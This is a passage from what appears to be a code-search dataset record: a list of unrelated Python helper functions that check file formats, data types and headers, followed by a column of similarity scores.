FITS 4.0: 3.3.2\n return False\n else: # it's an extension and so marked\n return ( (len(ff_hdus_list) > which_hdu) and\n (ff_hdus_list[which_hdu].header.get('XTENSION') in ['BINTABLE', 'TABLE']) )", "def isScreen(fmt):\n if fmt == 'CONS' or fmt == 'XWIN' or fmt =='XWLi':\n return 1\n return 0", "def check_ftype(cmd_args):\n if (cmd_args.period == 99 and cmd_args.f_type == 'grib'):\n return False\n else:\n return True", "def is_DIP(target):\n # logging.info(\"Calling is_DIP on %s\" % target)\n try:\n with open(target, 'rb') as f:\n file_header = f.read(7)\n return file_header == DIP_HEADER\n except IOError:\n return False\n except FileNotFoundError:\n return False", "def dnr_check(self, header):\n try:\n return self.locate.dnr_check(header)\n except Exception:\n return False", "def is_pointer(_format):\n return isinstance(_format, ML_Pointer_Format)", "def is_dbl_supported(device=None):\n dev = device if device is not None else get_device()\n res = ct.c_bool(False)\n safe_call(backend.get().af_get_dbl_support(ct.pointer(res), dev))\n return res.value", "def validate_log_entry(self):\n if (self.size() <= LOG_ENTRY_SIZE_HEADER) or (self.size() % LOG_ENTRY_SIZE_ALIGNMENT != 0):\n return False\n\n if self.hbins_size() % 0x1000 != 0:\n return False\n\n if self.hash_2() != self.calculate_hash_2() or self.hash_1() != self.calculate_hash_1():\n return False\n\n return True", "def is_type_correct(*args):\n return _ida_hexrays.is_type_correct(*args)", "def _has_numeric_strict(self) -> bool:\n return bool({'i', 'f'} & self._data.keys())", "def has_hash(self, h):\n rsp = h.hashlist(self.path)\n if re.search(\"\\n[0-9a-f]+\\smd5\\s%s\" % self.path, rsp):\n rval = True\n else:\n rval = False\n return rval", "def is_p4d_printable(c):\n if ord(c) < 0x20:\n return False\n if ord(c) == 0x7F:\n return False\n return True", "def is_splitted(self):\n\t\treturn bool(call_sdk_function('PrlVmDevHd_IsSplitted', self.handle))", "def __flt_eq_blh(self, other):\n if self.blush is None:\n return True\n\n return self.blush == other.blush", "def is_distance(x, y):\n assert (x.dtype == np.float64 and y.dtype == np.float64) or (\n x.dtype == np.float32 and y.dtype == np.float32)\n\n # TODO\n raise NotImplementedError", "def include_hxl_row(dv_columns, hxl_columns):\n return bool(set(hxl_columns).intersection(set(dv_columns)))", "def isFissile(self):\n raise NotImplementedError", "def check_rmap_relevance(self, header):\n try:\n source, compiled = self._rmap_relevance_expr\n relevant = eval(compiled, {}, header) # secured\n log.verbose(\"Filekind \", repr(self.instrument), repr(self.filekind),\n \"is relevant:\", relevant, repr(source), verbosity=55)\n except Exception as exc:\n log.warning(\"Failed checking relevance for\", repr(self.instrument),\n repr(self.filekind), \"with expr\", repr(source),\n \":\", str(exc))\n else:\n if not relevant:\n raise crexc.IrrelevantReferenceTypeError(\n \"Rmap does not apply to the given parameter set based on rmap_relevance expression.\")", "def pixeldq_propagation(output_hdul, reference_hdul, input_hdul):\n nframes = output_hdul[0].header['NFRAMES']\n groupgap = output_hdul[0].header['GROUPGAP']\n nints, ngroups, nx, ny = output_hdul['SCI'].shape\n nframes_tot = (nframes+groupgap)*ngroups\n if nframes_tot > reference_hdul['SCI'].data.shape[0]:\n result = np.all(input_hdul['PIXELDQ'].data == output_hdul['PIXELDQ'].data)\n return result\n\n else:\n result = np.all(core_utils.bitwise_propagate(reference_hdul, input_hdul['PIXELDQ'].data) == output_hdul['PIXELDQ'].data)\n return result", 
"def osarch_is_32_bit():\n return osarch_match(\"32-bit\")", "def is_header(line, max_level):\n if max_level:\n return len(re.findall(\"^#{{1,{0}}} .+\".format(max_level), line)) > 0\n else:\n return len(re.findall(\"^#+ .+\", line)) > 0", "def is_fits_file (fyl):\n return (fnmatch.fnmatch(fyl, _FITS_PAT) or fnmatch.fnmatch(fyl, _GZFITS_PAT))", "def checkfile(filename, source=None):\n if source:\n # Let's check some sums\n if os.path.exists(filename) and os.path.exists(source):\n src_sha = calchash(source)\n dest_sha = calchash(filename)\n if DRYRUN:\n print(\"{src} hash {src_sha}. {dest} hash {dest_sha}\".format(src=source, dest=filename, src_sha=src_sha.hexdigest(), dest_sha=dest_sha.hexdigest()))\n return src_sha.digest() == dest_sha.digest()\n else:\n return os.path.exists(filename)", "def longdouble_precision_improved():\n return not longdouble_lte_float64() and _LD_LTE_FLOAT64", "def is_raw_hmeta_key(term: str) -> bool:\n\n # The minimal viable term is '([ZZZ])', We do some quick checks\n if term is None or len(term) < 7:\n return False\n\n if not term.startswith('(') or not term.endswith(')') or \\\n term.index('[') == -1 or term.index(']') == -1:\n return False\n\n # TODO: the has_hsilo_syntax is doing a very basic check. Some\n # responsability will be passed for check later, like actually\n # compare to an know language. But we could at least check\n # here for wrong number of open and closed () [].\n\n return True", "def is_64_windows():\n return 'PROGRAMFILES(X86)' in os.environ", "def is_double_scalar_reg(register):\n if register in [ProcessorRegister.double_scalar_0,\n ProcessorRegister.double_scalar_1]:\n return True\n else:\n return False", "def is_passing(hi_sens, hi_prec, purity, min_sensitivity, min_precision, min_supported_purity):\n # type: (float, float, float, float, float, float) -> bool\n if purity < min_supported_purity:\n return True\n if hi_sens < min_sensitivity:\n return False\n if hi_prec < min_precision:\n return False\n return True", "def safe_check(dicts, kernel_name):\n x_shape = dicts[0].get(\"shape\")\n x_dtype = dicts[0].get(\"dtype\").lower()\n rois_shape = dicts[1].get(\"shape\")\n rois_dtype = dicts[1].get(\"dtype\").lower()\n\n y_dtype = dicts[3].get(\"dtype\").lower()\n y_shape = dicts[3].get(\"shape\")\n\n profile = tik.Dprofile()\n tik_name_check = tbe_platform.cce_conf.get_soc_spec(\"SOC_VERSION\")\n if tik_name_check in (\"Ascend310\", \"Ascend910\", \"Hi3796CV300ES\", \"Hi3796CV300CS\"):\n util.check_dtype_rule(x_dtype, (\"float16\",))\n util.check_dtype_rule(rois_dtype, (\"float16\",))\n else:\n util.check_dtype_rule(x_dtype, (\"float16\", \"float32\"))\n util.check_dtype_rule(rois_dtype, (\"float16\", \"float32\"))\n\n if x_dtype != rois_dtype or x_dtype != y_dtype:\n raise RuntimeError(\"dtype in x, rois and y must be equal\")\n\n util.check_shape_rule(x_shape, min_dim=5, max_dim=5)\n util.check_tensor_shape_size(x_shape)\n util.check_shape_rule(rois_shape, min_dim=3, max_dim=3)\n util.check_tensor_shape_size(rois_shape)\n util.check_shape_rule(y_shape, min_dim=5, max_dim=5)\n util.check_tensor_shape_size(y_shape)\n\n roi_max_num = rois_shape[2]\n if roi_max_num > 6000 or roi_max_num % 16 != 0:\n raise ValueError(\"the dim 2 of rois_shape is illegal\")\n\n util.check_kernel_name(kernel_name)", "def Check_AlphaScreen_FHs(mol, detail=False, showSMILES=False):\n AlphaScreen = Filter('AlphaScreen_FHs',detail, showSMILES)\n AlphaScreen.get_pattl()\n res = AlphaScreen.scan(mol)\n return res", "def to_win_64_hex(self):\n ts_type = 
self.ts_types['windows_hex_64']\n try:\n dt_obj = duparser.parse(self.timestamp)\n if hasattr(dt_obj.tzinfo, '_offset'):\n dt_tz = dt_obj.tzinfo._offset.total_seconds()\n dt_obj = duparser.parse(self.timestamp, ignoretz=True)\n else:\n dt_tz = 0\n minus_epoch = dt_obj - self.epoch_1601\n calculated_time = minus_epoch.microseconds + ((minus_epoch.seconds - int(dt_tz)) * 1000000) + (minus_epoch.days * 86400000000)\n self.out_windows_hex_64 = str(hex(int(calculated_time)*10))[2:].zfill(16)\n ts_output = str(\"{}\\t\\t{}\".format(ts_type, self.out_windows_hex_64))\n except Exception:\n exc_type, exc_obj, exc_tb = sys.exc_info()\n print(str(exc_type) + \" - \" + str(exc_obj) + \" - line \" + str(exc_tb.tb_lineno))\n self.out_windows_hex_64 = ts_output = False\n return self.out_windows_hex_64, ts_output", "def sanity_check(left_line, right_line):\n\n # check horizontal separation distance\n if abs(right_line.line_base_pos - left_line.line_base_pos) > 4.0:\n #print(\"Line base positions too far from each other\")\n return False\n\n # check lines are roughly parallel\n # if base pos and raduius of both lines are ok, it should be enough\n # to check the X distances of a few points with respect to their y positions\n # so slice the Y points into chunks and check\n chunksize = 200\n length = min(len(left_line.ally), len(right_line.ally))\n\n # TODO: error handling\n if (right_line.allx is not None) and (left_line.allx is not None):\n bias = None\n for i in range(0, length, chunksize):\n\n # take x at car as bias\n if bias is None:\n bias = abs(right_line.allx[i] - left_line.allx[i]) * left_line.xm_per_pix\n else:\n if abs(bias - abs(right_line.allx[i] - left_line.allx[i])*left_line.xm_per_pix) > 1.0:\n #print(\"Lines are not parallel\")\n return False\n else:\n return False\n\n # check curvatures -- the curvatures for left and right should be roughly\n # in the same magitude -- check for error\n if abs(left_line.radius_of_curvature - right_line.radius_of_curvature) > 200:\n #print(\"Line radius of curvature too different\")\n return False\n\n return True", "def check(header, out):\r\n for i in range(len(header)):\r\n if header[i] > 0:\r\n if header[i] != int(out[i]):\r\n return False\r\n return True", "def checkendsilence(inputgiven):\n output = getlastslice(inputgiven)\n wave_file = wave.open(output, \"r\")\n for i in range(wave_file.getnframes()):\n current_frame = wave_file.readframes(1)\n unpacked_signed_value = struct.unpack(\"<h\", current_frame)\n if abs(unpacked_signed_value[0]) > 500:\n return False\n return True", "def check_boundary(self, width, height):\r\n if 0 <= self.head[0] + self.direction[0]*10 <= width - 10 and 0 <= self.head[1] + self.direction[1]*10 <= height - 10:\r\n return True\r\n else:\r\n return False", "def should_i_even_bother(file_bytes):\n if file_bytes[E_MAG[0]:E_MAG[1]] == (str(0x7f) + \"ELF\"):\n if file_bytes[E_BIT[0]] == 1:\n if file_bytes[E_END[0]] == 1:\n return True #this is a 32-bit little-endian ELF file\n return False #this is not a 32-bit little-endian ELF file", "def _is_truncated(self) -> bool:\n raise NotImplementedError", "def payload_is_handleable(self, payload):\n\t\tif payload.get_filename():\n\t\t\treturn True\n\t\treturn False", "def is_raw_hdp_item_syntax(thing: dict) -> bool:\n\n hcor = get_raw_hcor(thing)\n hmeta = get_raw_hmeta(thing)\n\n return (hmeta is not None) and (hcor is not None)", "def compare_vendor_price_list_detail_dial_digits_grid_destination(self):\n self.buy_page_excel_data_dictionary = self.get_excel_data_dictionary()\n 
is_compared = False\n dial_digits_grid_destination = self.get_specific_column_value_from_grid(self.vendor_price_list_detail_dial_digits_grid_div_id, 1, self.destination_column_name)\n if self.buy_page_excel_data_dictionary[\"Destination\"] == dial_digits_grid_destination:\n is_compared = True\n return is_compared", "def is_float(space, w_obj):\n return space.wrap(w_obj.tp == space.tp_float)", "def _session_has_export(self) -> bool:\n return bool(self._get_current_session_tiling_list())", "def export_heads(heads_file, grid, hdry, hnflo,\n kstpkper=(0, 0), levels=None, interval=None,\n export_water_table=True, export_depth_to_water=False,\n export_layers=False, land_surface_elevations=None,\n output_path='postproc', suffix=''):\n if np.isscalar(kstpkper[0]):\n kstpkper = [kstpkper]\n print('Exporting heads...')\n print('file: {}'.format(heads_file))\n\n pdfs_dir, rasters_dir, shps_dir = make_output_folders(output_path)\n\n outfiles = []\n for kstp, kper in kstpkper:\n print('stress period {}, timestep {}'.format(kper, kstp))\n # Heads output\n hdsobj = bf.HeadFile(heads_file)\n hds = hdsobj.get_data(kstpkper=(kstp, kper))\n \n if export_water_table or export_depth_to_water:\n wt = get_water_table(hds, nodata=hdry)\n wt[(wt > 9999) | (wt < 0)] = np.nan\n outfile = '{}/wt_per{}_stp{}{}.tif'.format(rasters_dir, kper, kstp, suffix)\n ctr_outfile = '{}/wt_ctr_per{}_stp{}{}.shp'.format(shps_dir, kper, kstp, suffix)\n export_array(outfile, wt, grid, nodata=hnflo)\n export_array_contours(ctr_outfile, wt, grid, levels=levels, interval=interval)\n outfiles += [outfile, ctr_outfile]\n \n if export_depth_to_water:\n if land_surface_elevations is None:\n raise ValueError(('export_heads: export_depth_to_water option '\n 'requires specification of the land surface'))\n if not isinstance(land_surface_elevations, np.ndarray):\n land_surface_elevations = np.loadtxt(land_surface_elevations)\n \n # Depth to water\n dtw = land_surface_elevations - wt \n\n # Overpressurization\n op = dtw.copy()\n # For DTW, mask areas of overpressurization;\n # For Overpressurization, mask areas where water table is below land surface\n op = np.ma.masked_array(op, mask=op > 0)\n dtw = np.ma.masked_array(dtw, mask=dtw < 0)\n \n if np.max(dtw) > 0:\n #dtw_levels = None\n #if interval is not None:\n # dtw_levels = np.linspace(0, np.nanmax(dtw), interval)\n outfile = '{}/dtw_per{}_stp{}{}.tif'.format(rasters_dir, kper, kstp, suffix)\n ctr_outfile = '{}/dtw_ctr_per{}_stp{}{}.shp'.format(shps_dir, kper, kstp, suffix)\n export_array(outfile, dtw, grid, nodata=hnflo)\n export_array_contours(ctr_outfile, dtw, grid, interval=interval)\n outfiles += [outfile, ctr_outfile]\n else:\n print('Water table is above land surface everywhere, skipping depth to water.')\n \n if np.nanmin(op) < 0:\n #op_levels = None\n #if interval is not None:\n # op_levels = np.linspace(0, np.nanmin(op), interval)\n outfile = '{}/op_per{}_stp{}{}.tif'.format(rasters_dir, kper, kstp, suffix)\n ctr_outfile = '{}/op_ctr_per{}_stp{}{}.shp'.format(shps_dir, kper, kstp, suffix)\n export_array(outfile, op, grid, nodata=hnflo)\n export_array_contours(ctr_outfile, op, grid, interval=interval)\n outfiles += [outfile, ctr_outfile]\n else:\n print('No overpressurization, skipping.')\n \n\n hds[(hds > 9999) | (hds < 0)] = np.nan\n\n if export_layers:\n for k, h in enumerate(hds):\n outfile = '{}/hds_lay{}_per{}_stp{}{}.tif'.format(rasters_dir, k, kper, kstp, suffix)\n ctr_outfile = '{}/hds_ctr_lay{}_per{}_stp{}{}.shp'.format(shps_dir, k, kper, kstp, suffix)\n 
export_array(outfile, h, grid, nodata=hnflo)\n export_array_contours(ctr_outfile, h, grid, levels=levels, interval=interval,\n )\n outfiles += [outfile, ctr_outfile]\n return outfiles", "def test_log_dtypes(dtypes, capsys, test_df):\n\n @log_step(dtypes=dtypes)\n def do_nothing(df, *args, **kwargs):\n return df\n\n test_df.pipe(do_nothing)\n\n captured = capsys.readouterr()\n\n assert (\"dtypes=\" in captured.out) == dtypes\n\n if dtypes:\n assert str(test_df.dtypes.to_dict()) in captured.out", "def verify_as_target(self, message_handler):\n\n super().verify_as_target(message_handler)\n\n if self.msvc_target() != '64':\n raise UserException(\"MSVC is not configured for a 64-bit target\")", "def _validate_format(format_type):\n if format_type not in GeopandasWriter.formats:\n raise ValueError('Unsupported file format.')\n\n return True", "def species_has_freq(species_output_dict: dict) -> bool:\n if species_output_dict['paths']['freq'] or species_output_dict['paths']['composite']:\n return True\n return False", "def verifyShiftFile(self):\n if self['refimage'] and fu.findFile(self['refimage']):\n return True\n else: return False", "def test_make_binary_and_fp(self):\n output_mask = boundary_mask(df=os.path.join(data_dir, 'sample.csv'),\n geom_col=\"PolygonWKT_Pix\")\n truth_mask = skimage.io.imread(os.path.join(data_dir,\n 'sample_b_mask_inner.tif'))\n\n assert np.array_equal(output_mask, truth_mask)", "def _is_real(symbol):\n return isa(symbol, float) or is_int(symbol)", "def _has_right(self, j):\n return self._right(j) < len(self._data)", "def osarch_is_amd64():\n return osarch_match(\"amd64\")", "def signature_check(dummy, *args, **kwargs):\n try:\n dummy(*args, **kwargs)\n return True\n\n except TypeError:\n return False", "def _is_double(arr):\n\n # Figure out which dtype for data\n if arr.dtype == np.float32:\n return False\n elif arr.dtype == np.float64:\n return True\n else:\n raise ValueError(\"Only float32 or float64 dtypes are supported\")", "def has_right(self):\n return self.r is not None", "def check_has_dims(hdr):\n try:\n return (hdr['startX'], hdr['startY'])\n except KeyError:\n return False", "def test_short_header():\n with open(TEST_FILE_DXT5, \"rb\") as f:\n img_file = f.read()\n\n def short_header():\n with Image.open(BytesIO(img_file[:119])):\n pass # pragma: no cover\n\n with pytest.raises(OSError):\n short_header()", "def _type_check_double(self, data):\n if type(data) not in self._VALID_TYPES:\n return False\n return True", "def _check_truncation(self):\n\n temp_pos = self._handle.tell()\n self._handle.seek(-28, 2)\n eof = self._handle.read()\n self._handle.seek(temp_pos)\n if eof == _bgzf_eof:\n return False\n else:\n warnings.BytesWarning('No EOF character found. File may be truncated')\n return True", "def _has_printable_details(cls, categories, result_events_by_status):\n for category in categories:\n result_status_id = category[0]\n print_matching_tests = category[2]\n if print_matching_tests:\n if len(result_events_by_status[result_status_id]) > 0:\n # We found a printable details test result status\n # that has details to print.\n return True\n # We didn't find any test result category with printable\n # details.\n return False", "def test_kernel_hdrs_are_files(dataset: linux.LinuxSourcesDataset):\n for path in dataset.kernel_hdrs:\n assert path.is_file()" ]
[ "0.4971328", "0.46334147", "0.46194386", "0.46194386", "0.4604871", "0.4570718", "0.45214003", "0.45135522", "0.44693208", "0.44124466", "0.44066575", "0.44048572", "0.43934348", "0.43365443", "0.42555895", "0.4250501", "0.42504188", "0.42486706", "0.42251563", "0.4212047", "0.42047936", "0.41862556", "0.4112214", "0.41018462", "0.41007584", "0.40941316", "0.40904295", "0.40823355", "0.40790966", "0.40730295", "0.40599126", "0.403348", "0.4029554", "0.40273196", "0.40235263", "0.40114373", "0.39974904", "0.3992429", "0.39919725", "0.39778274", "0.39608744", "0.39595863", "0.39496619", "0.3942119", "0.39330813", "0.39284807", "0.39175943", "0.3912554", "0.3898651", "0.38971", "0.38966188", "0.3880652", "0.3879244", "0.38787842", "0.38753334", "0.38704824", "0.3852862", "0.38494197", "0.38443834", "0.3835735", "0.38276982", "0.382727", "0.38272518", "0.38205475", "0.38155863", "0.38126916", "0.38024986", "0.37906706", "0.3786908", "0.37854192", "0.37824824", "0.37791717", "0.3777909", "0.3777495", "0.37771943", "0.3776828", "0.37746513", "0.3766733", "0.37661263", "0.37613678", "0.3760275", "0.375796", "0.37566718", "0.3756244", "0.37524545", "0.37517887", "0.37502363", "0.37461016", "0.3740009", "0.37378207", "0.3734266", "0.37322098", "0.37296098", "0.37290102", "0.37284362", "0.3724881", "0.37209812", "0.37144157", "0.37106094", "0.3709791" ]
0.59550357
0
This function will close the conditional guard opened by conditional_guard.
def close_conditional_guard(close_conditional):
    for _ in range(close_conditional):
        print("#endif")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __exit__(self, type, value, traceback) :\n if self.spec :\n self.handle.close()\n self.handle = None", "def __exit__(self, type, value, traceback):\n self._conn.close()\n if self._mode == 'w' and self.__special_exit != 'lock exists':\n if os.path.exists('%s_lock'%self._path):\n os.unlink('%s_lock'%self._path)\n else:\n print('Exiting write mode but no lock file exists => should not happen !')\n return 1\n return 0", "def __exit__(self, exc_type, exc_value, traceback):\n self.close()\n return False # any exception is raised by the with statement.", "def __exit__(self, exc_type, exc_value, traceback):\n self.close()\n return False", "def __exit__(self, unused_type, unused_value, unused_traceback):\n self.close()", "def __exit__(self, unused_exception_type, unused_exc_value, unused_traceback):\n self.close()", "def __exit__(self, exc_type, exc_value, traceback):\n if self._close_on_exit:\n self.close()", "def __exit__(self, *args):\n self.close()\n return False", "def __exit__(self, type_, value, traceback):\n self.close()", "def __exit__(self, exc_type, exc_value, traceback):\n self.close()", "def __exit__(self, exc_type, exc_value, traceback):\n self.close()", "def __exit__(self, exc_type, exc_value, traceback):\n self.close()", "def __exit__(self, exc_type, exc_value, traceback):\n self.close()", "def __exit__(self, unused_exception_type, unused_exc_value, unused_traceback):\r\n self.close()", "def __exit__(self, type, value, traceback):\n self.fhandle.close()\n self._cleanup()", "def __exit__(self, type, value, traceback):\n self.close()", "def __exit__(self, type, value, traceback):\n self.close()", "def __exit__(self, type, value, traceback):\n self.close()", "def __exit__(self, type, value, traceback):\n self.close()", "def __exit__(self, type, value, traceback):\n self.close()", "def __exit__(self, exc_type, exc_value, traceback):\n return self.close()", "def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()", "def __exit__(self, exc_type, exc_value, traceback) -> bool:\n self.close()\n return False", "def __exit__(self, type, value, traceback):\n\n self.close()", "def __exit__(self, exc_type, exc_value, exc_traceback):\n\n self.close()", "def _close(self):\n # TODO\n self.holding = False", "def __exit__(self, *args):\n self.close()\n # propagate exception\n return False", "def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()\n try:\n self._store.close()\n except AttributeError:\n pass", "def close(self):\n self.__exit__(None, None, None)", "def close(self):\n self.__exit__(None, None, None)", "def close():\n sys.exit()", "async def __aexit__(self, *exc_info):\n await self.close()\n return False", "def __exit__(self, exception_type, exception, traceback):\n self.close()", "def __exit__(self, exception_type, exception, traceback):\n self.close()", "def __exit__(self, *args, **kwargs):\n\t\tfcntl.flock(self.file, fcntl.LOCK_UN)\n\t\tself.file.close()\n\t\tfor function in self.exit_functions:\n\t\t\tfunction()", "def __exit__(self, type, value, traceback):\r\n if self.is_locked:\r\n self.release()", "def close():", "async def __aexit__(self, exc_type, exc_value, exc_tb):\n await self.close()\n # check for any exceptions\n if exc_type is not None:\n return False\n return True", "def __exit__(self, exception_type, exception_value, traceback):\n self.fileobject.close()", "def close(self):\n if self.hcam is not None:\n lib.is_ExitCamera(self.hcam)\n self.hcam=None\n self.hcam=None", "def close_and_exit(self):\n self.close()\n sys.exit(1)", "def do_close(self):\n 
self.cleanup(True)\n self.close()", "def __exit__(self, type_, value, traceback):\n if self.is_locked:\n self.release()", "def close(self):\n if self.dev_open:\n try:\n self.lib().close()\n except CygnetExc:\n pass\n self.dev_open = False", "def __del__(self):\n\n if self._is_open:\n self.close()", "def close(self):\n \n self.__exit__(None, None, None)\n return", "def close(self):\n self.is_open = False", "def __exit__(\n self,\n exc_type: Optional[Type[BaseException]],\n exc_value: Optional[BaseException],\n traceback: Optional[TracebackType],\n ) -> Optional[bool]:\n\n self.close()\n return super().__exit__(exc_type, exc_value, traceback)", "def __exit__(self, *_exc):\r\n self.release()", "def __del__(self):\n if self._close_on_exit:\n self.close()", "async def __aexit__(self, exc_type, exc_val, exc_tb):\n await self._close()", "def close(self):\n # This is a placeholder which is simply here to ensure close() can be\n # safely called from subclasses without worrying whether super-class'\n # have it (which in turn is useful in conjunction with the SourceMixin\n # class).\n pass", "def on_cleanup(self):\n self.close()", "def on_cleanup(self):\n self.close()", "def __exit__(self, exc_type, exc_value, traceback):\n self.file_out.close()", "def close(self):\n if self.current_file_number is not None:\n self.fh_raw.close()\n self.current_file_number = None", "def close(self):\n self.log.debug('RFSwitch - in RFSwitch close()')\n # Add code here to be executed only when the resource is closed.\n print(\"Calling RFSwitch:close\")", "def _closecontextmanager(self):\n yield\n self.close()", "def _closecontextmanager(self):\n yield\n self.close()", "def __exit__(self, exc_type, exc_val, exc_tb):\n self.delete()\n if exc_type:\n return False\n return True", "def __exit__(self, exc_type, exc_value, exc_tb) -> None:\n self.destroy()", "def __exit__(self, exc_type, exc_value, exc_tb) -> None:\n self.destroy()", "def _close(self):\n self.fh.close()", "def close (self):\n pass\n #TODO: implement more realistic closing semantics", "def handle_close(self):\n self.active = False\n self.close()", "def __exit__(self, type, value, traceback):\r\n self.release()", "def __exit__(self, exc_type, exc_val, exc_tb) -> None:\n for obj in self.__dict__.values():\n if hasattr(obj, 'close'):\n obj.close()", "def __exit__(self, type, value, traceback):\n if not self.committed:\n self.write_coll.drop()\n\n if self.client is not None:\n self.client.close()\n self.client = None\n self.write_coll = None", "def terminate(self):\n super(ReacherEnv, self).close()", "async def __aexit__(self, exc_type, exc_val, exc_tb):\n self.release()\n return False", "def close(self):\n if self._open:\n self._open = False", "def release(self):\n if self.is_locked:\n os.close(self.fd)\n os.unlink(self.lockfile)\n self.is_locked = False", "def gt_helper_closed(self):\n self.gt_helper_open = False", "def close(self) -> None:\n ...", "def close(self) -> None:\n ...", "def __del__(self):\n try:\n self.close()\n except:\n pass", "def release(self):\r\n if self.is_locked:\r\n os.close(self.fd)\r\n os.unlink(self.lockfile)\r\n self.is_locked = False", "def __del__(self):\n if not getattr(self, \"closed\", True):\n self.close()", "def release(self):\n #关闭文件,删除文件\n if self.fd is not None:\n os.close(self.fd)\n os.unlink(self.lockfile)\n self.is_locked = False\n self.fd = None", "def close(self):\n self.__CheckOpen('close')\n self.__closed = True", "def close(self) -> None:", "def close(self) -> None:", "def close(self) -> None:", "def close(self) -> 
None:", "def close(self) -> None:", "def close(self) -> None:", "def close(self) -> None:", "def close(self) -> None:", "def safe_close(x):\n if not isinstance(x, io.IOBase):\n return\n if x.closed:\n return\n try:\n x.close()\n except Exception:\n pass", "def close_file_handle(self):\n if self.file_handle and self.output_file:\n self.file_handle.close()", "def release(self):\r\n\r\n if self._lock_fd:\r\n unlock_file(self._lock_fd, close=True)\r\n self._lock_fd = None\r\n return True\r\n else:\r\n return False", "async def aclose(self):\n with _core.open_cancel_scope(shield=True):\n if self.stdin is not None:\n await self.stdin.aclose()\n if self.stdout is not None:\n await self.stdout.aclose()\n if self.stderr is not None:\n await self.stderr.aclose()\n try:\n await self.wait()\n finally:\n if self.returncode is None:\n self.kill()\n with _core.open_cancel_scope(shield=True):\n await self.wait()", "def _close(self):\n log.Debug('dpbx.close():')", "def close(self):\n self.closed = True", "def close(self):\n self.exit()", "def close(self):\n ...", "def close(self):\n ...", "def __exit__(self, exc_type, exc_val, exc_tb):\n self.session.close()", "def __exit__(self, exc_type, exc_value, tb):\n if exc_type is not None:\n traceback.print_exception(exc_type, exc_value, tb)\n # return False # uncomment to pass exception through\n\n return True \n\n self.db = None\n self.client.close()\n\n return True", "def handle_close(self):\n storage.close()" ]
[ "0.6132105", "0.6084127", "0.6026904", "0.59685796", "0.59367067", "0.5921348", "0.5896142", "0.5895424", "0.5871011", "0.5860161", "0.5860161", "0.5860161", "0.5860161", "0.58590287", "0.58513856", "0.58342", "0.58342", "0.58342", "0.58342", "0.58342", "0.582248", "0.5806662", "0.5763474", "0.56884664", "0.5667379", "0.56626195", "0.56329864", "0.56240195", "0.5593488", "0.5593488", "0.5572039", "0.55582464", "0.5546976", "0.5546976", "0.5531616", "0.55252236", "0.5521608", "0.55150276", "0.54558486", "0.54268855", "0.54262346", "0.54259884", "0.54222965", "0.5420512", "0.54192746", "0.5419142", "0.53617036", "0.5360865", "0.5355155", "0.53530645", "0.5351024", "0.53431314", "0.53383315", "0.53383315", "0.5333428", "0.5314696", "0.5278073", "0.52752495", "0.52752495", "0.5261382", "0.525671", "0.525671", "0.52560174", "0.52552", "0.5254876", "0.5248747", "0.5247428", "0.52459353", "0.5242696", "0.5238975", "0.52257305", "0.5225449", "0.52195185", "0.5218177", "0.5218177", "0.521526", "0.52098554", "0.51988846", "0.5170201", "0.5168862", "0.516581", "0.516581", "0.516581", "0.516581", "0.516581", "0.516581", "0.516581", "0.516581", "0.51651067", "0.5165036", "0.51608855", "0.516053", "0.5158139", "0.5154844", "0.5144969", "0.5144561", "0.5144561", "0.51315683", "0.511124", "0.5096017" ]
0.6058337
2
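For context, a minimal runnable sketch of how close_conditional_guard from the record above pairs with a guard-opening helper. The conditional_guard shown here is a hypothetical stand-in (its body, including the cl_khr_fp64 check, is an assumption and is not part of this record); only close_conditional_guard matches the document field.

def conditional_guard(src, dst):
    # Hypothetical opener (assumed): emit an #ifdef when either type needs an
    # extension guard and report how many guards were opened.
    opened = 0
    if "double" in (src, dst):
        print("#ifdef cl_khr_fp64")
        opened += 1
    return opened

def close_conditional_guard(close_conditional):
    # Matches the document above: close every guard that was opened.
    for _ in range(close_conditional):
        print("#endif")

# Usage: every guard opened before the generated code is closed afterwards.
n = conditional_guard("double", "int")
print("/* generated conversion code goes here */")
close_conditional_guard(n)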
This helper function returns the correct clc core conversion function name for a given source and destination type, with optional size, mode and saturation arguments.
def clc_core_fn_name(dst, size='', mode='', sat=''):
    return "__clc_convert_{DST}{N}{SAT}{MODE}".format(DST=dst, N=size, SAT=sat, MODE=mode)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def src_get_name(converter_type):\n return ffi.string(_lib.src_get_name(converter_type)).decode()", "def cython_funcname(self, name, argkinds=None):\n if isinstance(name, basestring):\n return name\n if argkinds is None:\n argkinds = [(Arg.NONE, None)] * (len(name) - 1)\n fname = name[0]\n cfs = []\n for x, (argkind, argvalue) in zip(name[1:], argkinds):\n if argkind is Arg.TYPE:\n cf = self.cython_functionname(x)[1]\n elif argkind is Arg.LIT:\n cf = self.cython_literal(x)\n elif argkind is Arg.VAR:\n cf = x\n elif isinstance(x, Number):\n cf = self.cython_literal(x)\n else:\n try:\n cf = self.cython_functionname(x)[1] # guess type\n except TypeError:\n cf = x # guess variable\n cfs.append(cf)\n fname += '' if 0 == len(cfs) else \"_\" + \"_\".join(cfs)\n return fname", "def function_name_to_string(func):\n if func == statistical_parity_difference:\n return \"Statistical Parity Difference\"\n if func == theil_index:\n return \"Theil Index\"\n if func == equal_opportunity_difference:\n return \"Equal Opportunity Difference\"\n if func == disparate_impact:\n return \"Disparate Impact\"\n if func == average_odds_difference:\n return \"Average Odds Difference\"\n if func == auc:\n return \"AUC\"\n if func == binary_accuracy:\n return \"Binary Accuracy\"", "def cython_functionname(self, t, cycyt=None):\n if cycyt is None:\n t = self.canon(t)\n if isinstance(t, basestring):\n return t, self.cython_functionnames[t]\n elif t[0] in self.base_types:\n return t, self.cython_functionnames[t[0]]\n return self.cython_functionname(t, self.cython_functionnames[t[0]])\n d = {}\n for key, x in zip(self.template_types[t[0]], t[1:-1]):\n if isinstance(x, basestring):\n val = self.cython_functionnames[x] if x in self.cython_functionnames \\\n else x\n elif isinstance(x, Number):\n val = str(x).replace('-', 'Neg').replace('+', 'Pos')\\\n .replace('.', 'point')\n elif x[0] in self.base_types:\n val = self.cython_functionnames[x[0]]\n else:\n _, val = self.cython_functionname(x, self.cython_functionnames[x[0]])\n d[key] = val\n return t, cycyt.format(**d)", "def get_conv(name):\n trans_funs = {\n 'mbconv_transform': MBConv,\n 'mbtalkconv_transform': MBTalkConv,\n }\n assert name in trans_funs.keys(), \\\n 'Transformation function \\'{}\\' not supported'.format(name)\n return 